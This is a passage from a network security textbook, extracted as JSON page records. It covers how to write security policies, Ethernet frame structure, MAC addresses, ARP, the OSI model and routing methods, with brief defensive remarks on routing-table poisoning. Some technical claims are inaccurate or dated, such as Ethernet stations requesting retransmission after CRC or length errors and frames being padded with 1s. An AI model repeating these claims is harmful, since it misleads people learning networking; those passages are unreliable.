\nRoles and Responsibilities \nAny chain is only as strong as its weakest link, so be sure to make it clear that all members of the organization are \nresponsible for asset security. Security is everyone’s concern, not just a part of a particular person’s job \ndescription. \nBe sure to identify who is responsible for enforcing security policies and what type of authorization this person \nhas from the organization. If a user is asked to surrender access to the system, it is crucial that a clear policy be in \nplace identifying who has the authority to make such a request. \nConsequences of Noncompliance \nWhat if an employee fails to follow or simply ignores a specific security policy issue? Your organization must \nhave a reaction or remedy in place if this occurs. Be sure your policy includes a description of possible reprisals \nfor noncompliance. \n" }, { "page_number": 25, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 25\nIt is important that this statement be both legal and clearly defined. Stating that “appropriate action will be taken” \ndoes not describe the severity of possible repercussions. Many times a reprisal is left vague because the people \nwriting a policy cannot agree on a proper response. It is extremely important that a proper remedy be assigned, \nhowever, because the severity of the penalty can help convey just how seriously your organization views the issue. \nFor example, sending harassing e-mail may be considered grounds for dismissal, while cruising the Web in order \nto find the best price for a home computer may only warrant a verbal warning. When you identify consequences of \nnoncompliance, be specific about what actions your organization may take. \nFor More Information \nIt is difficult to formulate a policy that clearly defines all potential aspects of a specific issue. For this reason, you \nshould identify a resource responsible for providing additional information. \nSince individuals’ responsibilities can change, identify this resource by job function rather than by name. It’s \nbetter to write, “Consult your direct supervisor for more information” or “Direct all queries regarding this issue to \nthe network security administrator” than “Forward all questions to Billy Bob Smith.” \nLevel of Privacy \nPrivacy is always a hot topic: your organization should clearly state its views on privacy with regard to \ninformation stored on organizational resources. If an organization does not expressly claim all ownership of stored \ninformation, this information may be construed the property of the employee. \nDon’t assume that company private information is private—spell it out. There was a well-publicized case a \nnumber of years ago in which a high-level executive left his job for a position with a major competitor. Suspecting \nthat this person may have walked off with some private information, the company retrieved and reviewed all of his \ne-mail messages. They found evidence that this ex-employee had in fact left with some information that the \ncompany considered vital to maintaining its competitive edge. \nWhen the case went to trial, however, the e-mail was considered inadmissible because there was no clear policy \nidentifying e-mail as a company-owned resource. The defense argued that e-mail is identical to postal mail and as \nsuch enjoys the same level of privacy. \nThe judge in the case was well aware that the U.S. Post Office is not allowed to open personal letters without a \ncourt order. The defense argued that, in this situation, the company should be held to the same standard as the Post \nOffice, since its resources were responsible for delivering the mail. As a result, the e-mail was declared \ninadmissible and the company lost its case due to lack of evidence. \nThe moral of this story is that it is extremely important to assert ownership of network resources, and to spell out \nthe measures that can be taken to enforce described policy issues. \nIssues Not Specifically Defined \nWhen implementing a firewall, two potential stances are possible with regards to network traffic. The first is “that \nwhich is not expressly permitted is denied;” the second is “that which is not expressly denied is permitted.” The \nfirst takes a firm stance with regard to security, while the latter is a more liberal approach. \nThese same principles apply to your security policy. You can design your policy to be restrictive (“That which is \nnot expressly permitted is denied”) or open (“That which is not expressly denied is permitted”) with regard to \nmatters that are not clearly defined. This provides a fallback position if an issue arises that is not specifically \ndescribed by your security policy. This is a good idea, as you will inevitably forget to mention something. \nInclude a statement outlining the organization’s stance on issues not explicitly addressed within the security policy \nitself. Which approach is more appropriate will depend on how strict a security policy you are trying to create. \nTypically, however, it is easier to begin with a tighter stance on security and then open up additional policies as \nthe need arises. \nExample of a Good Policy Statement \nNow that we have covered the individual points of a good security policy, let’s look at a specific example to see \nhow to tie these points together. You will find more examples in Appendix B. \nThe following is an example of a policy statement excerpt: \n" }, { "page_number": 26, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 26\nAccess to Internet-based Web server resources shall only be allowed for the express purpose of \nperforming work-related duties. This policy is to insure the effective use of networking resources \nand shall apply equally to all employees. This policy shall be enforced during both production and \nnon-production time periods. All Web server access can be monitored by networking personnel, and \nemployees may be required to justify Web server access to their direct supervisor. Failure to comply \nwith this policy will result in the issuance of a written warning. For more information regarding \nwhat is considered appropriate Web server access of Internet resources, please consult your direct \nsupervisor. \nNow let’s see if this statement includes everything we have discussed. \nDefine Each Issue This policy specifically addresses “access to Internet-based Web server \nresources.” The statement clearly defines the issue to which it pertains. \nYour Organization’s Position The statement goes on to declare that Internet access “shall only be \nallowed for the express purpose of performing work-related duties.” The organization’s stance is \nclear. Web browsing is for performing work-related activities only. \nJustifying the Policy To justify restriction of Internet access, the policy states, “This policy is to \ninsure the effective use of networking resources.” Again, the wording is clear and to the point. The \norganization is looking to minimize Internet traffic by restricting Internet use to work-related \nfunctions only. \nWhen Does the Issue Apply? The policy specifies that Internet access restrictions “shall apply \nequally to all employees. This policy shall be enforced during both production and non-production \ntime periods.” This spells out that the policy is in effect at all times and that all employees are \nsubject to its guidelines. \nRoles and Responsibilities The policy goes on to state that networking personnel are responsible \nfor monitoring proper Web server access and adds that “employees may be required to justify Web \nserver access to their direct supervisor.” This requires each employee to justify all Internet Web \nserver access. It also shows that supervisors are responsible for approving these justifications. The \ndocument assumes that some mechanism is in place to notify the supervisor when her subordinates \naccess Internet Web servers. \nConsequences of Noncompliance The policy goes on to state, “Failure to comply with this policy \nwill result in the issuance of a written warning.” Short, sweet, and to the point, this sentence shows \nwhat may happen if an employee violates this portion of the security policy. \nContact Information for Further Details Finally, the policy directs, “For more information \nregarding what is considered appropriate Web server access of Internet resources, please consult \nyour direct supervisor.” The policy tells readers what information is available and where to get it. \n(The policy does assume here that the supervisor knows the answers or where to get them.) \nLevel of Privacy Privacy is mentioned only briefly in our sample policy excerpt, but the policy \nstill goes straight to the point: “All Web server access can be monitored by networking personnel.” \nThis implies that the user can expect zero privacy when accessing Internet-based Web servers. \nThis statement does not, however, define the level of monitoring that may be performed. For \nexample, it does not specify whether network personnel will review the servers visited, the URLs, \n" }, { "page_number": 27, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 27\nor the actual page content. In this case, lack of specificity should not be considered a bad thing, \nbecause it allows the network administrator some flexibility in the level of audits. \nSummary \nYou should now have a sound understanding of how to evaluate the level of security your \nenvironment requires. You should know which assets you need to protect and their inherent value to \nyour organization. This risk analysis will be the cornerstone for each of the security precautions \ndiscussed in this book. \nYou should also know how to write an effective security policy, understanding the importance of a \nprecise security policy to securing your environment. \nIn the next chapter, we will take a look at how systems communicate. Many security exploits involve \n“bending” the communication rules, so comprehending how network information is exchanged is vital \nto securing against such attacks. \nChapter 3: Understanding How Network Systems \nCommunicate \nIn this chapter, we will review how networked systems move data from point A to point B. I am assuming that you \nalready understand the basics of networking, such as how to assign a valid network address to a device. This \nchapter will focus on exactly what is going on behind the scenes and along your network cabling. This knowledge \nis critical in order to give context to the security concepts covered in subsequent chapters. \nThe Anatomy of a Frame of Data \nWhen data is moved along a network, it is packaged inside a delivery envelope called a frame. Frames are \ntopology-specific. An Ethernet frame needs to convey different information than a Token Ring or an ATM frame. \nSince Ethernet is by far the most popular topology, we will cover it in detail here. \nEthernet Frames \nAn Ethernet frame is a set of digital pulses transmitted onto the transmission media in order to convey \ninformation. An Ethernet frame can be anywhere from 64 to 1,518 bytes (a byte being 8 digital pulses or bits) in \nsize and is organized into four sections: \nƒ \nPreamble \nƒ \nHeader \nƒ \nDate \nƒ \nFrame check sequence \nPreamble A preamble is a defined series of communication pulses that tells all receiving stations, “Get \nready—I’ve got something to say.” The standard preamble is eight bytes long. \nNote \nBecause the preamble is considered part of the communication process and not part of the \nactual information being transferred, it is not usually included when measuring a frame’s \nsize. \nHeader A header always contains information about who sent the frame and where it is going. It \nmay also contain other information, such as how many bytes the frame contains; this is referred to \nas the length field and is used for error correction. If the receiving station measures the frame to be a \ndifferent size than indicated in the length field, it asks the transmitting system to send a new frame. \nIf the length field is not used, the header may instead contain a type field that describes what type of \nEthernet frame it is. \n" }, { "page_number": 28, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 28\nNote \nThe header size is always 14 bytes. \nData The data section of the frame contains the actual data the station needs to transmit, as well as \nany protocol information, such as source and destination IP address. The data field can be anywhere \nfrom 46 to 1,500 bytes in size. If a station has more than 1,500 bytes of information to transfer, it \nwill break up the information over multiple frames and identify the proper order by using sequence \nnumbers. Sequence numbers identify the order in which the destination system should reassemble the \ndata. This sequence information is also stored in the data portion of the frame. \nIf the frame does not have 46 bytes’ worth of information to convey, the station pads the end of this \nsection by filling it in with 1 (remember that digital connections use binary numbers). Depending on \nthe frame type, this section may also contain additional information describing what protocol or \nmethod of communication the systems are using. \nFrame Check Sequence (FCS) The frame check sequence is used to insure that the data received is \nactually the data sent. The transmitting system processes the FCS portion of the frame through an \nalgorithm called a cyclic redundancy check or CRC. This CRC takes the values of the above fields and \ncreates a 4-byte number. When the destination system receives the frame, it runs the same CRC and \ncompares it to the value within this field. If the destination system finds a match, it assumes the \nframe is free of errors and processes the information. If the comparison fails, the destination station \nassumes that something happened to the frame in its travels and requests that another copy of the \nframe be sent by the transmitting system. \nNote \nThe FCS size is always 4 bytes. \nThe Frame Header Section \nNow that we have a better understanding of what an Ethernet frame is, let’s take a closer look at the header \nsection. The header information is ultimately responsible for identifying who sent the data and where the sender \nwanted it to go. \nThe header contains two fields to identify the source and destination of the transmission. These are the node \naddresses of both the source and destination systems. This number is also referred to as the media access control \n(MAC) address. The node address is a unique number that is used to serialize network devices (like network cards \nor networking hardware) and is a unique identifier that distinguishes it from any other networking device in the \nworld. No two networking devices should ever be assigned the same number. Think of this number as equivalent \nto a telephone number. Every home with a telephone has a unique phone number so that the phone company \nknows where to direct the call. In this same fashion, a system will use the destination system’s MAC address to \nsend the frame to the proper system. \nNote \nThe MAC address has nothing specifically to do with Apple’s computers and is always \nrepresented in all capital letters. It is the number used by all the systems attached to the \nnetwork (PCs and Macs included) to uniquely identify themselves. \nThis 6-byte, 12-digit hexadecimal number is broken up into two parts. The first half of the address is the \nmanufacturer’s identifier. A manufacturer is assigned a range of MAC addresses to use when serializing its \ndevices. Some of the more prominent MAC addresses appear in Table 3.1. \nTable 3.1: Common MAC Addresses \nFirst Three Bytes of MAC Address \nManufacturer \n00000C \nCisco \n0000A2 \nBay \n" }, { "page_number": 29, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 29\nTable 3.1: Common MAC Addresses \nFirst Three Bytes of MAC Address \nManufacturer \nNetworks \n0080D3 \nShiva \n00AA00 \nIntel \n02608C \n3Com \n080009 \nHewlett-\nPackard \n080020 \nSun \n08005A \nIBM \nTip \nThe first three bytes of the MAC address can be a good troubleshooting aid. If you are \ninvestigating a problem, try to determine the source MAC address. Knowing who made the \ndevice may put you a little closer to determining which system is giving you trouble. For \nexample, if the first three bytes are 0000A2, you know you need to focus your attention on \nany Bay Networks device on your network. \nThe second half of the MAC address is the serial number the manufacturer has assigned to the device. \nOne address worthy of note is FF-FF-FF-FF-FF-FF. This is referred to as a broadcast address. A broadcast \naddress is special: it means all systems receiving this packet should read the included data. If a system sees a \nframe that has been sent to the broadcast address, it will read the frame and process the data if it can. \nNote \nYou should never encounter a frame that has a broadcast address in the source \nnode field. The Ethernet specifications do not include any conditions where the \nbroadcast address should be placed in the source node field. \nThe Address Resolution Protocol \nHow do you find out what the destination node address is so that you can send data to a system? After all, network \ncards do not ship with phone books. Finding a node address is done with a special frame referred to as an address \nresolution protocol (ARP) frame. ARP functions differently depending on which protocol you’re using (such as \nIPX, IP, NetBEUI, and so on). \nFor an example, see Figure 3.1. This is a decode of the initial packet from a system that wishes to send \ninformation to another system on the same network. Notice the information included within the decode. The \ntransmitting system knows the IP address of the destination system, but it does not know the destination node \naddress. Without this address, local delivery of data is not possible. ARP is used when a system needs to discover \nthe destination system’s node address. \nNote \nA frame decode is the process of converting a binary frame transmission to a format that \ncan be understood by a human being. Typically, this is done using a network analyzer. \n \nFigure 3.1: A transmitting system attempting to discover the destination system’s node address \nKeep in mind that ARP is only for local communications. When a packet of data crosses a router, the Ethernet \nheader will be rewritten so that the source node address is that of the router, not the transmitting system. This \nmeans that a new ARP request may need to be generated. \nFigure 3.2 shows how this works. Our transmitting system (Fritz) needs to deliver some information to the \ndestination system (Wren). Since Wren is not on the same subnet as Fritz, it transmits an ARP in order to discover \nthe node address of Port A on the local router. Once Fritz knows this address, Fritz transmits its data to the router. \n" }, { "page_number": 30, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 30\n \nFigure 3.2: Node addresses are used for local communications only. \nOur router will then need to send an ARP out of Port B in order to discover the node address of Wren. Once Wren \nreplies to this ARP request, the router will strip off the Ethernet frame from the data and create a new one. The \nrouter replaces the source node address (originally Fritz’s node address) with the node address of Port B. It will \nalso replace the destination node address (originally Port A) with the node address of Wren. \nNote \nIn order for the router to communicate on both subnets, it needed two unique \nnode addresses, one for each port. If Fritz were launching an attack against \nWren, you could not use the source node address within the frame on Wren’s \nsubnet in order to identify the transmitting system. While the source node address \nwill tell you where the data entered this subnet, it will not identify the original \ntransmitting system. \nWhen Fritz realized that Wren was not on the same subnet, he went looking for a router. A system will run \nthrough a process similar to that shown in Figure 3.3 when determining how best to deliver data. Once a system \nknows where it needs to send the information, it transmits the appropriate ARP request. \n \nFigure 3.3: ARP decision process \nAll systems are capable of caching information learned through ARP requests. For example, if Fritz wished a few \nseconds later to send another packet of data to Wren, he would not have to transmit a new ARP request for the \nrouter’s node address since this value would be saved in memory. This memory area is referred to as the ARP \ncache. \nARP cache entries are retained for up to 60 seconds. After that, they are typically flushed out and must be learned \nagain through a new ARP request. It is also possible to create static ARP entries, which creates a permanent entry \nin the ARP cache table. This way, a system is no longer required to transmit ARP requests for nodes with a static \nentry. \nFor example, you could create a static ARP entry for the router on Fritz’s machine so that it would no longer have \nto transmit an ARP request when looking for this device. The only problem would occur if the router’s node \n" }, { "page_number": 31, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 31\naddress changed. If the router were to fail and you had to replace it with a new one, you would also have to go \nback to Fritz’s system and modify the static ARP entry because the new router would have a different node \naddress. \n \n \nA Protocol’s Job \nYou have seen that when a system wants to transfer information to another system, it does so by \ncreating a frame with the target system’s node address in the destination field of the frame header. \nThis method of communication is part of your topology’s communication rules. This transmission \nraises the following questions: \nƒ \nShould the transmitting system simply assume the frame was received in one piece? \nƒ \nShould the destination system reply, saying, “I received your frame, thanks!”? \nƒ \nIf a reply should be sent, does each frame require its own acknowledgment, or is it OK to \nsend just one for a group of frames? \nƒ \nIf the destination system is not on the same local network, how do you figure out where to \nsend your data? \nƒ \nIf the destination system is running e-mail, transferring a file, and browsing Web pages on \nthe source system, how does it know which application this data is for? \nThis is where a protocol comes in. A protocol’s job is to answer these questions—as well as any \nothers that may pop up in the course of the communication. When we talk about IP, IPX, AppleTalk, \nor NetBEUI, we are talking about protocols. So why are the specifications that characterize a \nprotocol not simply defined by the topology? \nThe answer is: diversity. If the communication properties of IP were tied into the Ethernet topology, \neveryone would be required to use Ethernet for all network segments; this includes wide-area \nnetwork links. You could not choose to use Token Ring or ATM, because these services would only \nbe available on Ethernet. By defining a separate set of communication rules (protocols), these rules \ncan now be applied over any OSI-compliant topology. This was not the case with legacy systems, \nwhich is why the OSI model was developed. \nThe OSI Model \nIn 1977 the International Standards Organization (ISO) developed the Open Systems Interconnection Reference \nModel (OSI model) to help improve communications between different vendors’ systems. The ISO was a \ncommittee representing many different organizations, whose goal was not to favor a specific method of \ncommunication but to develop a set of guidelines that would allow vendors to insure that their products would \ninteroperate. \nThe ISO was setting out to simplify communications between systems. There are many events that must take place \nin order to insure that data first reaches the correct system and is then passed along to the correct application in a \nuseable format. A set of rules was required to break down the communication process into a simple set of building \nblocks. \nThe OSI model consists of seven layers. Each layer describes how its portion of the communication process \nshould function, as well as how it will interface with the layers directly above it, below it, and adjacent to it on \nother systems. This allows a vendor to create a product that operates on a certain level and to be sure it will \noperate in the widest range of applications. If the vendor’s product follows a specific layer’s guidelines, it should \nbe able to communicate with products created by other vendors that operate at adjacent layers. \nTo use the analogy of a house for just a moment, think of the lumber yard that supplies main support beams used \nin house construction. As long as the yard follows the guidelines for thickness and material, builders can expect \nbeams to function correctly in any house that has a proper foundation structure. \nSimplifying a Complex Process \nAn analogy to the OSI model would be the process of building a house. While the final product may seem a \ncomplex piece of work, it is much simpler when it is broken down into manageable sections. \n" }, { "page_number": 32, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 32\nA good house starts with a foundation. There are rules that define how wide the foundation wall must be, as well \nas how far below the frost line it needs to sit. After that, the house is framed off or packaged. Again, there are \nrules to define how thick the lumber must be and how far each piece of framing can span without support. \nOnce the house is framed, there is a defined process for putting on a roof, adding walls, and even connecting the \nelectrical system and plumbing. By breaking down this complicated process into small, manageable sections, \nbuilding a house becomes easier. This breakdown also makes it easier to define who is responsible for which \nsection. For example, the electrical contractor’s responsibilities include running wires and adding electrical \noutlets, but not shingling the roof. \nThe entire structure becomes an interwoven tapestry with each piece relying on the others. For example, the frame \nof our house requires a solid foundation. Without it, the frame will eventually buckle and fall. The frame may also \nrequire that load-bearing walls be placed in certain areas of the house in order to insure that the frame does not fall \nin on itself. \nThe OSI model strives to set up these same kinds of definitions and dependencies. Each portion of the \ncommunication process becomes a separate building block. This makes it easier to determine what each portion of \nthe communication process is required to do. It also helps to define how each piece will be connected to the others. \n \nFigure 3.4 is a representation of the OSI model in all its glory. Let’s take the layers one at a time to determine the \nfunctionality expected of each. \n \nFigure 3.4: The OSI model \nPhysical Layer The physical layer describes the specifications of our transmission media, \nconnectors, and signal pulses. A repeater or a hub is a physical layer device because it is frame-\nstupid and simply amplifies the electrical signal on the wire and passes it along. \nData-Link Layer The data-link layer describes the specifications for topology and communication \nbetween local systems. Ethernet is a good example of a data-link layer specification, as it works \nwith multiple physical layer specifications (twisted-pair cable, fiber) and multiple network layer \nspecifications (IPX, IP). The data-link layer is the “door between worlds,” connecting the physical \naspects of the network (cables and digital pulses) with the abstract world of software and data \nstreams. Bridges and switches are considered to be data-link devices because they are frame-aware. \nBoth use information specific to the frame header to regulate traffic. \n" }, { "page_number": 33, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 33\nNetwork Layer The network layer describes how systems on different network segments find each \nother; it also defines network addresses. A network address is a name or number assigned to a group \nof physically connected systems. \nNote \nThe network address is assigned by the network administrator and should not be confused \nwith the MAC address assigned to each network card. The purpose of a network address \nis to facilitate data delivery over long distances. Its functionality is similar to the zip code \nused when mailing a regular letter. \nIP, IPX, and AppleTalk’s Datagram Delivery Protocol (DDP) are all examples of network-layer \nfunctionality. Service and application availability are based on functionality prescribed at this level. \nNote \nFor more detail about network layer functionality, see “More on the Network Layer” later \nin this chapter. \nTransport Layer The transport layer deals with the actual manipulation of your data and prepares it \nfor delivery through the network. If your data is too large for a single frame, the transport layer \nbreaks it up into smaller pieces and assigns sequence numbers. Sequence numbers allow the \ntransport layer on the other receiving system to reassemble the data into its original content. While \nthe data link layer performs a CRC check on all frames, the transport layer can act as a backup \ncheck to insure that all the data was received and is usable. Examples of transport layer \nfunctionality are IP’s Transmission Control Protocol (TCP), User Datagram Protocol (UDP), IPX’s \nSequence Packet Exchange (SPX), and AppleTalk’s AppleTalk Transaction Protocol (ATP). \nSession Layer The session layer deals with establishing and maintaining a connection between two \nor more systems. It insures that a query for a specific type of service is made correctly. For \nexample, if you try to access a system with your Web browser, the session layers on both systems \nwork together to insure you receive HTML pages and not e-mail. If a system is running multiple \nnetwork applications, it is up to the session layer to keep these communications orderly and to \ninsure that incoming data is directed to the correct application. In fact, the session layer maintains \nunique conversations within a single service. For example, imagine downloading two distinct Web \npages from the same Web site at the same time (from the same computer). The session layer \nmaintains the integrity of each file transfer—making sure the two data streams aren’t mixed up or \notherwise confused by the receiving system. \nPresentation Layer The presentation layer insures that data is received in a format that is usable to \napplications running on the system. For example, if you are communicating over the Internet using \nencrypted communications, the presentation layer would be responsible for encrypting and \ndecrypting this information. Most Web browsers support this kind of functionality for performing \nfinancial transactions over the Internet. Data and language translations are also done at this level. \nApplication Layer The label application layer is a bit misleading, because this term does not \ndescribe the actual program that a user may be running on a system. Rather, this is the layer that is \nresponsible for determining when access to network resources is required. For example, Microsoft \nWord does not function at the application layer of the OSI model. If a user tries to retrieve a \n" }, { "page_number": 34, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 34\ndocument from her home directory on a server, however, the application layer networking software \nis responsible for delivering her request to the remote system. \nNote \nIn geek lingo, the layers are numbered in the order I’ve described them. If I were to state \nthat switches function at layer 2 of the OSI model, you would interpret this to mean that \nswitches work within the guidelines provided by the data-link layer of the OSI model. \nHow the OSI Model Works \nLet’s look at an example to see how these layers work together. Assume you’re using your word processing \nprogram, and you want to retrieve a file called resume.txt from your home directory on a remote server. The \nnetworking software running on your system would react similarly to the description that follows. \nFormulating a File Request \nThe application layer detects that you are requesting information from a remote file system. It formulates a request \nto that system that resume.txt should be read from disk. Once it has created this request, the application layer \npasses the request off to the presentation layer for further processing. \nThe presentation layer determines if it needs to encrypt this request or perform any type of data translation. Once \nthis has been determined and completed, the presentation layer then adds any information it needs to pass along to \nthe presentation layer on the remote system and forwards the packet down to the session layer. \nThe session layer checks which application is requesting the information and verifies what service is being \nrequested from the remote system (file access). The session layer adds information to the request to ensure that the \nremote system knows how to handle this request. Then it passes all this information along to the transport layer. \nThe transport layer ensures that it has a reliable connection to the remote system and begins the process of \nbreaking down all the information so that it can be packaged into frames. If more than one frame is required, the \ninformation is split up and each block of information is assigned a sequence number. These sequenced chunks of \ninformation are passed one at a time down to the network layer. \nThe network layer receives the blocks of information from the transport layer and adds the network address for \nboth this and the remote system. This is done to each block before it is passed down to the data-link layer. \nAt the data-link layer, the blocks are packaged into individual frames. As shown in Figure 3.5, all the information \nadded by each of the previous layers (as well as the actual file request) must fit into the 46- to 1,500-byte data field \nof the Ethernet frame. The data-link layer then adds a frame header, which consists of the source and destination \nMAC addresses, and uses this information (along with the contents of the data field) to create a CRC trailer. The \ndata-link layer is then responsible for transmitting the frame according to the topology rules in use on the network. \nDepending on the topology, this could mean listening for a quiet moment on the network, waiting for a token, or \nwaiting for a specific time division before transmitting the frame. \nNote \nThe physical layer does not add any information to the frame. \n \nFigure 3.5: The location of each layer’s information within our frame \n" }, { "page_number": 35, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 35\nThe physical layer is responsible for carrying the information from the source system to its destination. Because \nthe physical layer has no knowledge of frames, it is simply passing along the digital signal pulses transmitted by \nthe data-link layer. The physical layer is the medium by which a connection is made between the two systems; it is \nresponsible for carrying the signal to the data-link layer on the remote system. \nYour workstation has successfully formulated your data request (“Send me a copy of resume.txt.\") and transmitted \nit to the remote system. At this point, the remote system follows a similar process, but in reverse. \nReceiving Data on the Remote System \nThe data-link layer on the remote system reads in the transmitted frame. It notes that the MAC address in the \ndestination field of the header is its own and recognizes that it needs to process this request. It performs a CRC \ncheck on the frame and compares the results to the value stored in the frame trailer. If these values match, the data-\nlink layer strips off the header and trailer and passes the data field up to the networking layer. If the values do not \nmatch, the data-link layer sends a request to the source system asking that another frame be sent. \nThe network layer on the remote system analyzes the information recorded by the network layer on the source \nsystem. It notes that the destination software address is its own. Once this analysis is complete, the network layer \nremoves information related to this level and passes the remainder up to the transport layer. \nThe transport layer receives the information and analyzes the information recorded by the transport layer on the \nsource system. If it finds that packet sequencing was used, it queues any information it receives until all the data \nhas been received. If any of the data is missing, the transport layer uses the sequence information to formulate a \nreply to the source system, requesting that this piece of data be resent. Once all the data has been received, the \ntransport layer strips out any transport information and passes the full request up to the session layer. \nThe session layer receives the information and verifies that it is from a valid connection. If the check is positive, \nthe session layer strips out any session information and passes the request up to the presentation layer. \nThe presentation layer receives the frame and analyzes the information recorded by the presentation layer on the \nsource system. It then performs any translation or decryption required. Once translation or decryption has been \ncompleted, it strips out the presentation layer information and passes the request up to the application layer. \nThe application layer insures that the correct process running on the system receives the request for data. Because \nthis is a file request, it is passed to whichever process is responsible for access to the file system. \nThis process then reads the requested file and passes the information back to the application layer. At this point, \nthe entire process of passing the information through each of the layers would repeat. If you’re amazed that the \nrequested file is retrievable in anything less than a standard coffee break, then you have a pretty good idea of the \nmagnitude of what happens when you request a simple file. \nMore on the Network Layer \nAs I mentioned earlier, the network layer is used for delivery of information between logical networks. \nNote \nA logical network is simply a group of systems assigned a common network address by \nthe network administrator. These systems may be grouped together because they share a \ncommon geographical area or a central point of wiring. \nNetwork Addresses \nThe terminology used for network addresses is different depending on the protocol in use. If the protocol in use is \nIPX, the logical network is simply referred to as a network address. With IP it is a subnet and with AppleTalk it is \ncalled a zone. \nNote \nNetBIOS and NetBEUI are non-routable protocols, although NetBEUI can be thought of \nas overlapping the transport, network, and (the LLC portion of the) data-link layer. They \ndo not use network numbers and do not have the ability to propagate information between \nlogical network segments. A non-routable protocol is a set of communication rules that \nexpects all systems to be connected locally. A non-routable protocol has no direct method \nof traveling between logical networks. A NetBIOS frame is incapable of crossing a router \nwithout some form of help. \n \nRouters \n" }, { "page_number": 36, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 36\nRouters are used to connect logical networks, which is why they are sometimes referred to in the IP world as \ngateways. Figure 3.6 shows the effect of adding a router to a network. Notice that protocols on either side of the \ndevice must now use a unique logical network address. Information destined for a non-local system must be routed \nto the logical network on which the system resides. The act of traversing a router from one logical network to \nanother is referred to as a hop. When a protocol hops a router, it must use a unique logical network address on \nboth sides. \n \nFigure 3.6: The effects of adding a router to the network \nSo how do systems on one logical network segment find out what other logical segments exist on the network? \nRouters can either be statically programmed with information describing the path to follow in order to find remote \nnetworks, or they can use a special type of maintenance frame such as the routing information protocol (RIP) to \nrelay information about known networks. Routers use these frames and static entries to create a blueprint of the \nnetwork known as a routing table. \nNote \nRouting tables tell the router which logical networks are available to deliver information \nto and which routers are capable of forwarding information to that network. \nRouting Tables \nYou can think of a routing table as being like a road map. A road map shows all the streets in a local city or town \nin much the same way a routing table keeps track of all the local networks. \nWithout having some method for each of these routers to communicate and let each other know who is connected \nwhere, communication between logical network segments would be impossible. \nThere are three methods for routing information from one network to another: \nƒ \nStatic \nƒ \nDistance vector \nƒ \nLink state \nWhile each protocol has its own ways of providing routing functionality, each implementation can be broken \ndown into one of these three categories. \nStatic Routing \nStatic routing is the simplest method of getting information from one system to another. Used mostly in IP \nnetworks, a static route defines a specific router to be the point leading to a specific network. Static routing does \nnot require routers to exchange route information: it relies on a configuration file that directs all traffic bound for a \nspecific network to a particular router. This, of course, assumes that you can predefine all the logical networks you \nwill wish to communicate with. When this is not feasible (for example, when you are communicating on the \n" }, { "page_number": 37, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 37\nInternet), a single router may be designated as a default to receive all traffic destined for networks that have not \nbeen predefined. When static routing is used, most workstations receive an entry for the default router only. \nFor example, let’s assume I configure my system to have a default route that points to the router Galifrey. As my \nsystem passes information through the network layer, it will analyze the logical network of the destination system. \nIf the system is located on the same logical network, the data-link layer adds the MAC address of that system and \ntransmits the frame onto the wire. If the system is located on some other logical network, the data-link layer will \nuse the MAC address for Galifrey and transmit the frame to it. Galifrey would then be responsible for insuring that \nthe frame gets to its final destination. \nThe benefits of this type of routing are simplicity and low overhead. My workstation is not required to know or \ncare about what other logical networks may be available and how to get to them. It has only two possibilities to \nworry about—deliver locally or deliver to Galifrey. This can be useful when there is only one possible route to a \nfinal destination. For example, most organizations have only one Internet connection. Setting up a static route that \npoints all IP traffic to the router that borders this connection may be the easiest way to insure that all frames are \ndelivered properly. Because all my routing information is configured at startup, my routers do not need to share \nroute information with other routers. Each system is only concerned with forwarding information to its next \ndefault route. I do not need to have any dynamic routing frames propagated through my network, because each \nrouter has been preset as to where it should forward information. \nWhile static routing is easy to use, it does suffer from some major drawbacks that severely limit its application. \nWhen redundant paths are provided, or even when multiple routers are used on the same logical network, you may \nfind it more effective to use a routing method that is capable of exchanging dynamic routing information. \nDynamic routing allows routing tables to be developed on the fly, which can compensate for hardware failures. \nBoth distance vector and link state routing use dynamic routing information to insure routing tables stay up to \ndate. \nStatic Routing Security \nWhile static routing requires a high level of maintenance, it is also the most secure method of building your \nrouting tables. Dynamic routing allows routing tables to be updated dynamically by devices on the network. An \nattacker can exploit this feature in order to feed your routers incorrect routing information, thus preventing your \nnetwork from functioning properly. In fact, depending on the dynamic routing protocol you use, an attacker may \nonly need to feed this bogus information to a single router. The compromised router would then take care of \npropagating this bogus information throughout the rest of the network. \nEach static router is responsible for maintaining its own routing table. This means that if one router is \ncompromised, the effects of the attack are not automatically spread to every other router. A router using static \nrouting can still be vulnerable to ICMP redirect attacks, but its routing tables cannot be corrupted through the \npropagation of bad route information. \nNote \nFor more information on ICMP, see the “Packet Filtering ICMP” section of Chapter 5. \nDistance Vector Routing \nDistance vector is the oldest and most popular form of creating routing tables. This is primarily due to the routing \ninformation protocol (RIP), which is based on distance vector. For many years, distance vector routing was the \nonly dynamic routing option available, so it has found its way onto many networks. \nDistance vector routers build their tables on secondhand information. A router will look at the tables being \nadvertised by other routers and simply add 1 to the advertised hop values to create its own table. With distance \nvector, every router will broadcast its routing table once per minute. \nPropagating Network Information with Distance Vector \nFigure 3.7 shows how propagation of network information works with distance vector. \n" }, { "page_number": 38, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 38\n \nFigure 3.7: A routed network about to build its routing tables dynamically \nRouter A has just come online. Because the two attached networks (1 and 2) have been programmed into it, Router \nA immediately adds these to its routing table, assigning a hop value of 1 to each. The hop value is 1 instead of 0 \nbecause this information is relative to other attached networks, not the router. For example, if the router is \nadvertising the route to Network 1 on Network 2, then one hop is appropriate because any system sending \ninformation to Network 1 from Network 2 would have to travel one hop (the router itself) to get there. A router \nusually does not advertise routing information about a directly attached network on that network itself. This means \nthat the router should not transmit a RIP frame stating, “I can reach Network 1 in one hop,” on Network 1 itself. \nSo Router A sends out two RIP packets, one on each network, to let any other devices know about the connectivity \nit can provide. When Routers B and C receive these packets, they reply with RIP packets of their own. Remember \nthat the network was already up and running. This means that all the other routers have already had an opportunity \nto build their tables. From these other RIP packets, Router A collects the information shown in Table 3.2. \nTable 3.2: Routing 